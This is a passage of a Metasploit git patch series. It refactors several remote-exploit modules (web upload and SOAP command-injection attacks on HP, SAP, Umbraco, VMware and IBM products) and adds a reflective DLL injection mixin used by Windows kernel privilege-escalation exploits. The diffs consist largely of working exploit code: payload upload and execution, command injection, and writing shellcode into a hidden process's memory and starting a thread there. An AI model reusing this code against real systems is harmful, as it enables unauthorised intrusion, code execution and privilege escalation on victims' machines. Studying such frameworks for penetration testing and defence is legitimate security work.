     jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
     jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
@@ -86,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
     data = post_data.to_s
     data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
 
-    print_status("#{@peer} - Uploading the JSP payload...")
+    print_status("#{peer} - Uploading the JSP payload...")
     res = send_request_cgi({
       'uri'    => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
       'method' => 'POST',
@@ -96,13 +94,13 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res and res.code == 200 and res.body.empty?
-      print_status("#{@peer} - JSP payload uploaded successfully")
+      print_status("#{peer} - JSP payload uploaded successfully")
       register_files_for_cleanup(jsp_name)
     else
-      fail_with(Failure::Unknown, "#{@peer} - JSP payload upload failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
     end
 
-    print_status("#{@peer} - Executing payload...")
+    print_status("#{peer} - Executing payload...")
     send_request_cgi({
       'uri'    => normalize_uri(jsp_name),
       'method' => 'GET'
diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
index 88d2ad2ae9..8874861052 100644
--- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
+++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
@@ -82,9 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Delivering payload...")
+    print_status("#{peer} - Delivering payload...")
 
     # The path to the injection is something like:
     # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens)
@@ -133,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_soap_request("OPCACTIVATE", "omHost", command)
 
     if res.nil? or res.code != 200 or res.body !~ /runOMAgentCommandResponse/
-      fail_with(Failure::Unknown, "#{@peer} - Unexpected response, aborting...")
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response, aborting...")
     end
 
   end
diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
index 1138412869..13cab152d0 100644
--- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
+++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
@@ -346,9 +346,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     soap = <<-eos
 <?xml version="1.0" encoding="utf-8"?>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
@@ -384,7 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </SOAP-ENV:Envelope>
     eos
 
-    print_status("#{@peer} - Testing command injection...")
+    print_status("#{peer} - Testing command injection...")
 
     res = send_request_cgi({
       'uri'          => '/',
@@ -421,9 +418,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
 
-
-    @peer = "#{rhost}:#{rport}"
-
     soap = <<-eos
 <?xml version="1.0" encoding="utf-8"?>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
@@ -459,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </SOAP-ENV:Envelope>
     eos
 
-    print_status("#{@peer} - Injecting system commands...")
+    print_status("#{peer} - Injecting system commands...")
 
     res = send_request_cgi({
       'uri'          => '/',
@@ -472,9 +466,9 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 10)
 
     if (res and res.code == 500 and res.body =~ /Generic error/)
-      print_good("#{@peer} - System command successfully injected")
+      print_good("#{peer} - System command successfully injected")
     else
-      print_error("#{@peer} - Failed to inject system command")
+      print_error("#{peer} - Failed to inject system command")
       return
     end
 
@@ -511,7 +505,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </SOAP-ENV:Envelope>
     eos
 
-    print_status("#{@peer} - Executing injected command")
+    print_status("#{peer} - Executing injected command")
 
     res = send_request_cgi({
       'uri'          => '/',
@@ -524,7 +518,7 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 1)
 
     if res
-      print_error("#{@peer} - Failed to execute injected command")
+      print_error("#{peer} - Failed to execute injected command")
       return
     end
 
diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb
index 4ef7feb928..7490e69cd6 100644
--- a/modules/exploits/windows/http/umbraco_upload_aspx.rb
+++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       aspx = @upload_random + '.aspx'
 
-      print_status("#{@peer} - Searching: #{aspx}")
+      print_status("#{peer} - Searching: #{aspx}")
       files = cli.fs.file.search("\\", aspx)
       if not files or files.empty?
         print_error("Unable to find #{aspx}. Please manually remove it.")
@@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
       files.each { |f|
-        print_warning("#{@peer} - Deleting: #{f['path'] + "\\" + f['name']}")
+        print_warning("#{peer} - Deleting: #{f['path'] + "\\" + f['name']}")
         cli.fs.file.rm(f['path'] + "\\" + f['name'])
       }
-      print_good("#{@peer} - #{aspx} deleted")
+      print_good("#{peer} - #{aspx} deleted")
     rescue ::Exception => e
       print_error("Unable to delete #{aspx}: #{e.message}")
     end
@@ -90,9 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
   # Module based heavily upon Juan Vazquez's 'landesk_thinkmanagement_upload_asp.rb'
   def exploit
-
-    @peer = "#{rhost}:#{rport}"
-
     # Generate the ASPX containing the EXE containing the payload
     exe = generate_payload_exe
     aspx = Msf::Util::EXE.to_exe_aspx(exe)
@@ -124,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Remote
     #
 
     attack_url = uri_path + "webservices/codeEditorSave.asmx"
-    print_status("#{@peer} - Uploading #{aspx.length} bytes through #{attack_url}...")
-    print_status("#{@peer} - Uploading to #{uri_path}#{@upload_random}.aspx")
+    print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...")
+    print_status("#{peer} - Uploading to #{uri_path}#{@upload_random}.aspx")
 
     res = send_request_cgi({
       'uri'          => attack_url,
@@ -138,11 +135,11 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (! res)
-      print_status("#{@peer} - Timeout: Trying to execute the payload anyway")
+      print_status("#{peer} - Timeout: Trying to execute the payload anyway")
     elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)
-      print_status("#{@peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
+      print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
     else
-      print_status("#{@peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway")
+      print_status("#{peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway")
     end
 
     #
@@ -150,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #
 
     upload_path = uri_path + "#{@upload_random}.aspx"
-    print_status("#{@peer} - Executing #{upload_path}...")
+    print_status("#{peer} - Executing #{upload_path}...")
 
     res = send_request_cgi({
       'uri'          =>  upload_path,
@@ -158,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (! res)
-      print_error("#{@peer} - Execution failed on #{upload_path} [No Response]")
+      print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
       return
     end
 
     if (res.code < 200 or res.code > 302)
-      print_error("#{@peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
+      print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
       return
     end
 
@@ -186,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote
     eos
 
     attack_url = uri_path + "webservices/codeEditorSave.asmx"
-    print_status("#{@peer} - Writing #{aspx.length} bytes through #{attack_url}...")
-    print_status("#{@peer} - Wrting over #{uri_path}#{@upload_random}.aspx")
+    print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...")
+    print_status("#{peer} - Wrting over #{uri_path}#{@upload_random}.aspx")
 
     res = send_request_cgi({
       'uri'          => attack_url,
@@ -200,12 +197,12 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (! res)
-      print_error("#{@peer} - Deletion failed at #{attack_url} [No Response]")
+      print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
       return
     elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)
-      print_status("#{@peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
+      print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]")
     else
-      print_status("#{@peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]")
+      print_status("#{peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]")
     end
     handler
   end
diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
index 9c2fa10d7d..c92762639b 100644
--- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
+++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
@@ -67,17 +67,17 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if cli.type != 'meterpreter'
-      print_error("#{@peer} - Meterpreter not used. Please manually remove #{@dropper}")
+      print_error("#{peer} - Meterpreter not used. Please manually remove #{@dropper}")
       return
     end
 
     cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
 
     begin
-      print_status("#{@peer} - Searching: #{@dropper}")
+      print_status("#{peer} - Searching: #{@dropper}")
       files = cli.fs.file.search("\\", @dropper)
       if not files or files.empty?
-        print_error("#{@peer} - Unable to find #{@dropper}. Please manually remove it.")
+        print_error("#{peer} - Unable to find #{@dropper}. Please manually remove it.")
         return
       end
 
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
         print_warning("Deleting: #{f['path'] + "\\" + f['name']}")
         cli.fs.file.rm(f['path'] + "\\" + f['name'])
       }
-      print_good("#{@peer} - #{@dropper} deleted")
+      print_good("#{peer} - #{@dropper} deleted")
       return
     rescue ::Exception => e
-      print_error("#{@peer} - Unable to delete #{@dropper}: #{e.message}")
+      print_error("#{peer} - Unable to delete #{@dropper}: #{e.message}")
     end
   end
 
@@ -129,9 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Uploading JSP to execute the payload")
+    print_status("#{peer} - Uploading JSP to execute the payload")
 
     exe = payload.encoded_exe
     exe_filename = rand_text_alpha(8) + ".exe"
@@ -145,10 +143,10 @@ class Metasploit3 < Msf::Exploit::Remote
       register_files_for_cleanup(exe_filename)
       @dropper = dropper_filename
     else
-      fail_with(Failure::Unknown, "#{@peer} - JSP upload failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
     end
 
-    print_status("#{@peer} - Executing payload")
+    print_status("#{peer} - Executing payload")
     send_request_cgi(
     {
       'uri'    => normalize_uri("cbmui", "images", dropper_filename),
diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
index b75c721425..7b6e5330cf 100644
--- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
+++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
@@ -286,9 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll")
 
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Injecting DLL...")
+    print_status("#{peer} - Injecting DLL...")
 
     res = send_request_cgi({
       'uri'          => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll",
@@ -304,9 +302,9 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res and res.code == 200 and res.body =~ /CIMVERSION/
-      print_status"#{@peer} - Then injection seemed to work..."
+      print_status"#{peer} - Then injection seemed to work..."
     else
-      fail_with(Failure::Unknown, "#{@peer} - Unexpected response")
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response")
     end
   end
 

From bf3489203ae4ec2fc9eb66f8521aff881490680c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 3 Dec 2013 13:13:14 -0600
Subject: [PATCH 167/217] I missed this one

---
 modules/exploits/linux/http/astium_sqli_upload.rb | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb
index ce4c4eeeb5..3fa37da1a3 100644
--- a/modules/exploits/linux/http/astium_sqli_upload.rb
+++ b/modules/exploits/linux/http/astium_sqli_upload.rb
@@ -48,10 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ], self.class)
   end
 
-  def peer
-    return "#{rhost}:#{rport}"
-  end
-
   def uri
     return target_uri.path
   end

From f79af4c30e39b3a4a09ca79fed982265e59c306e Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 4 Dec 2013 16:09:41 +1000
Subject: [PATCH 168/217] Add RDI mixin module

MSF was starting to see more modules using RDI to load binaries into
remote processes, so it made sense to create a mixin which contained
the functionality that was being used in various locations.

This commit contains the new mixin, and adjustments to all the existing
exploits and modules which use RDI.
---
 .../payload/windows/reflectivedllinject.rb    | 22 ++---
 .../windows/x64/reflectivedllinject.rb        | 22 ++---
 lib/msf/core/rdi_mixin.rb                     | 80 +++++++++++++++++++
 .../windows/local/ms10_015_kitrap0d.rb        | 47 +++--------
 .../exploits/windows/local/ppr_flatten_rec.rb | 44 +++-------
 .../windows/manage/reflective_dll_inject.rb   | 68 +++-------------
 6 files changed, 132 insertions(+), 151 deletions(-)
 create mode 100644 lib/msf/core/rdi_mixin.rb

diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index 7b23556589..3784b7a43f 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'rex/peparsey'
+require 'msf/core/rdi_mixin'
 
 module Msf
 
@@ -15,6 +15,7 @@ module Msf
 
 module Payload::Windows::ReflectiveDllInject
 
+  include Msf::RdiMixin
   include Msf::Payload::Windows
 
   def initialize(info = {})
@@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject
       'Name'          => 'Reflective DLL Injection',
       'Description'   => 'Inject a DLL via a reflective loader',
       'Author'        => [ 'sf' ],
-      'References'    => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ],
+      'References'    => [
+        [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
+        [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
+      ],
       'Platform'      => 'win',
       'Arch'          => ARCH_X86,
       'PayloadCompat' =>
@@ -51,18 +55,8 @@ module Payload::Windows::ReflectiveDllInject
     offset = 0
 
     begin
-      File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
-
-      pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
-
-      pe.exports.entries.each do |entry|
-        if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
-          offset = pe.rva_to_file_offset( entry.rva )
-          break
-        end
-      end
-
-      raise "Can't find an exported ReflectiveLoader function!" if offset == 0
+      dll, offset = load_rdi_dll(library_path)
+      raise "Can't find an exported ReflectiveLoader function!" unless offset
     rescue
       print_error( "Failed to read and parse Dll file: #{$!}" )
       return
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index 68be5af44c..c63d0ed97e 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'rex/peparsey'
+require 'msf/core/rdi_mixin'
 
 module Msf
 
@@ -15,6 +15,7 @@ module Msf
 
 module Payload::Windows::ReflectiveDllInject_x64
 
+  include Msf::RdiMixin
   include Msf::Payload::Windows
 
   def initialize(info = {})
@@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject_x64
       'Name'          => 'Reflective DLL Injection',
       'Description'   => 'Inject a DLL via a reflective loader',
       'Author'        => [ 'sf' ],
-      'References'    => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ],
+      'References'    => [
+        [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
+        [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
+      ],
       'Platform'      => 'win',
       'Arch'          => ARCH_X86_64,
       'PayloadCompat' =>
@@ -51,18 +55,8 @@ module Payload::Windows::ReflectiveDllInject_x64
     offset = 0
 
     begin
-      ::File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
-
-      pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
-
-      pe.exports.entries.each do |entry|
-        if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
-          offset = pe.rva_to_file_offset( entry.rva )
-          break
-        end
-      end
-
-      raise "Can't find an exported ReflectiveLoader function!" if offset == 0
+      dll, offset = load_rdi_dll(library_path)
+      raise "Can't find an exported ReflectiveLoader function!" unless offset
     rescue
       print_error( "Failed to read and parse Dll file: #{$!}" )
       return
diff --git a/lib/msf/core/rdi_mixin.rb b/lib/msf/core/rdi_mixin.rb
new file mode 100644
index 0000000000..6e82a5505c
--- /dev/null
+++ b/lib/msf/core/rdi_mixin.rb
@@ -0,0 +1,80 @@
+# -*- coding: binary -*-
+
+###
+#
+# This module exposes functionality which makes it easier to do
+# Reflective DLL Injection into processes on a victim's machine.
+#
+###
+
+module Msf::RdiMixin
+
+  PAGE_ALIGN = 1024
+
+  #
+  # Inject the given shellcode into a target process.
+  #
+  # +process+ - The process to inject the shellcode into.
+  # +shellcode+ - The shellcode to inject.
+  #
+  # @return Address of the shellcode in the target process's memory.
+  #
+  def inject_into_process(process, shellcode)
+    shellcode_size = shellcode.length
+
+    unless shellcode.length % PAGE_ALIGN == 0
+      shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
+    end
+
+    shellcode_mem = process.memory.allocate(shellcode_size)
+    process.memory.protect(shellcode_mem)
+    process.memory.write(shellcode_mem, shellcode)
+
+    return shellcode_mem
+  end
+
+  #
+  # Load a reflectively-injectable DLL from disk and find the offset
+  # to the ReflectiveLoader function inside the DLL.
+  #
+  # +dll_path+ - Path to the DLL to load.
+  #
+  # #return Tuple of DLL contents and offset to the +ReflectiveLoader+
+  #         function within the DLL.
+  #
+  def load_rdi_dll(dll_path)
+    dll = ''
+    offset = nil
+
+    ::File.open(dll_path, 'rb') { |f| dll = f.read }
+
+    pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
+
+    pe.exports.entries.each do |e|
+      if e.name =~ /^\S*ReflectiveLoader\S*/
+        offset = pe.rva_to_file_offset(e.rva)
+        break
+      end
+    end
+
+    return dll, offset
+  end
+
+  #
+  # Inject a reflectively-injectable DLL into the given process
+  # using reflective injection.
+  #
+  # +process+ - The process that will have the DLL injected into it.
+  # +dll_path+ - Path to the DLL that is to be loaded and injected.
+  #
+  # @return Tuple of allocated memory address and offset to the
+  #         +ReflectiveLoader+ function.
+  #
+  def inject_dll_into_process(process, dll_path)
+    dll, offset = load_rdi_dll(dll_path)
+    dll_mem = inject_into_process(process, dll)
+
+    return dll_mem, offset
+  end
+
+end
diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
index 8680899def..e2cbc45eb6 100644
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/rdi_mixin'
 require 'msf/core/exploit/exe'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = GreatRanking
 
+  include Msf::RdiMixin
   include Post::File
   include Post::Windows::Priv
 
@@ -71,54 +73,29 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
     end
 
-    dll = ''
-    offset = nil
-
     print_status("Launching notepad to host the exploit...")
-    cmd = "notepad.exe"
-    opts = {'Hidden' => true}
-    process = client.sys.process.execute(cmd, nil, opts)
-    pid = process.pid
-    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
-    print_good("Process #{pid} launched.")
+    process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
+    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{process.pid} launched.")
 
-    print_status("Reflectively injecting the exploit DLL into #{pid}...")
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
     library_path = ::File.join(Msf::Config.data_directory, "exploits",
                                "CVE-2010-0232", "kitrap0d.x86.dll")
     library_path = ::File.expand_path(library_path)
-    ::File.open(library_path, 'rb') { |f| dll = f.read }
-    pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
-    pe.exports.entries.each do |e|
-      if e.name =~ /^\S*ReflectiveLoader\S*/
-        offset = pe.rva_to_file_offset(e.rva)
-        break
-      end
-    end
-    # Inject the exloit, but don't run it yet.
-    exploit_mem = inject_into_pid(dll, host_process)
 
-    print_status("Exploit injected. Injecting payload into #{pid}...")
-    # Inject the payload into the process so that it's runnable by the exploit.
-    payload_mem = inject_into_pid(payload.encoded, host_process)
+    print_status("Injecting exploit into #{process.pid} ...")
+    exploit_mem, offset = inject_dll_into_process(host_process, library_path)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(host_process, payload.encoded)
 
-    print_status("Payload injected. Executing exploit...")
     # invoke the exploit, passing in the address of the payload that
     # we want invoked on successful exploitation.
+    print_status("Payload injected. Executing exploit...")
     host_process.thread.create(exploit_mem + offset, payload_mem)
 
     print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
   end
 
-protected
-
-  def inject_into_pid(payload, process)
-    payload_size = payload.length
-    payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0
-    payload_mem = process.memory.allocate(payload_size)
-    process.memory.protect(payload_mem)
-    process.memory.write(payload_mem, payload)
-    return payload_mem
-  end
-
 end
 
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 980d9b856c..c6d845a552 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/rdi_mixin'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::RdiMixin
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
@@ -135,37 +137,25 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
-    dll = ''
-    offset = nil
-
     print_status("Launching notepad to host the exploit...")
-    cmd = "notepad.exe"
-    opts = {'Hidden' => true}
-    process = client.sys.process.execute(cmd, nil, opts)
-    pid = process.pid
-    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
-    print_good("Process #{pid} launched.")
+    process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
+    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{process.pid} launched.")
 
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
     library_path = ::File.join(Msf::Config.data_directory, "exploits",
                                "cve-2013-3660", "ppr_flatten_rec.x86.dll")
     library_path = ::File.expand_path(library_path)
-    ::File.open(library_path, 'rb') { |f| dll = f.read }
-    pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
-    pe.exports.entries.each do |e|
-      if e.name =~ /^\S*ReflectiveLoader\S*/
-        offset = pe.rva_to_file_offset(e.rva)
-        break
-      end
-    end
 
-    print_status("Injecting exploit and payload into #{pid}...")
-    # Inject the exploit and payload, but don't run it yet.
-    exploit_mem, payload_mem = inject_into_pid(dll, payload.encoded, host_process)
+    print_status("Injecting exploit into #{process.pid} ...")
+    exploit_mem, offset = inject_dll_into_process(host_process, library_path)
 
-    print_status("Injection complete. Executing exploit...")
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(host_process, payload.encoded)
 
     # invoke the exploit, passing in the address of the payload that
     # we want invoked on successful exploitation.
+    print_status("Payload injected. Executing exploit...")
     host_process.thread.create(exploit_mem + offset, payload_mem)
 
     # TODO: remove this Rex.sleep call when the WsfDelay stuff works correctly for local
@@ -177,16 +167,4 @@ class Metasploit3 < Msf::Exploit::Local
     print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
   end
 
-protected
-
-  def inject_into_pid(exploit, payload, process)
-    payload_size = exploit.length + payload.length
-    payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0
-    payload_mem = process.memory.allocate(payload_size)
-    process.memory.protect(payload_mem)
-    process.memory.write(payload_mem, exploit)
-    process.memory.write(payload_mem + exploit.length, payload)
-    return payload_mem, payload_mem + exploit.length
-  end
-
 end
diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb
index f88e3b80f3..a2c192d01e 100644
--- a/modules/post/windows/manage/reflective_dll_inject.rb
+++ b/modules/post/windows/manage/reflective_dll_inject.rb
@@ -4,10 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/rdi_mixin'
 require 'rex'
 
 class Metasploit3 < Msf::Post
 
+  include Msf::RdiMixin
+
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Windows Manage Reflective DLL Injection Module',
@@ -36,63 +39,18 @@ class Metasploit3 < Msf::Post
     # syinfo is only on meterpreter sessions
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
-    dll = ''
-    offset = nil
-    begin
-      File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) }
+    pid = datastore['PID'].to_i
+    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
 
-      pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
+    print_status("Injecting #{datastore['PATH']} into #{pid} ...")
+    dll_mem, offset = inject_dll_into_process(host_process, datastore['PATH'])
 
-      pe.exports.entries.each do |entry|
-        if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
-          offset = pe.rva_to_file_offset( entry.rva )
-          break
-        end
-      end
-
-      raise "Can't find an exported ReflectiveLoader function!" if offset.nil? or offset == 0
-    rescue
-      print_error( "Failed to read and parse Dll file: #{$!}" )
-      return
-    end
-
-    inject_into_pid(dll, datastore['PID'], offset)
-  end
-
-  def inject_into_pid(pay, pid, offset)
-
-    if offset.nil? or offset == 0
-      print_error("Reflective Loader offset is nil.")
-      return
-    end
-
-    if pay.nil? or pay.empty?
-      print_error("Invalid DLL.")
-      return
-    end
-
-    if pid.nil? or not has_pid?(pid)
-      print_error("Invalid PID.")
-      return
-    end
-
-    print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
-    begin
-      print_status("Opening process #{pid}")
-      host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
-      print_status("Allocating memory in procees #{pid}")
-      mem = host_process.memory.allocate(pay.length + (pay.length % 1024))
-      # Ensure memory is set for execution
-      host_process.memory.protect(mem)
-      vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes")
-      print_status("Writing the payload into memory")
-      host_process.memory.write(mem, pay)
-      print_status("Executing payload")
-      host_process.thread.create(mem+offset, 0)
-      print_good("Successfully injected payload in to process: #{pid}")
-    rescue ::Exception => e
-      print_error("Failed to Inject Payload to #{pid}!")
-      vprint_error(e.to_s)
+    if dll_mem && offset
+      print_status("DLL injected. Executing ReflectiveLoader ...")
+      host_process.thread.create(dll_mem + offset, 0)
+      print_good("DLL injected and invoked.")
+    else
+      print_error("DLL doesn't appear to be reflectively injectable.")
     end
   end
 end

From c8e2c8d085531b910792f9ad12d65c960a668107 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 4 Dec 2013 16:23:03 +1000
Subject: [PATCH 169/217] Add binaries from Meterpreter
 9e33acf3a283f1df62f264e557e1f6161d8c2999

This is a new set of binaries for Meterpreter as of commit hash
9e33acf3a283f1df62f264e557e1f6161d8c2999. We haven't yet finalised
the process we'll be using for releasing bins from Meterpreter to MSF
so this is hopefully the last time we will have to do it the old way.
---
 data/meterpreter/elevator.x64.dll             | Bin 90624 -> 90624 bytes
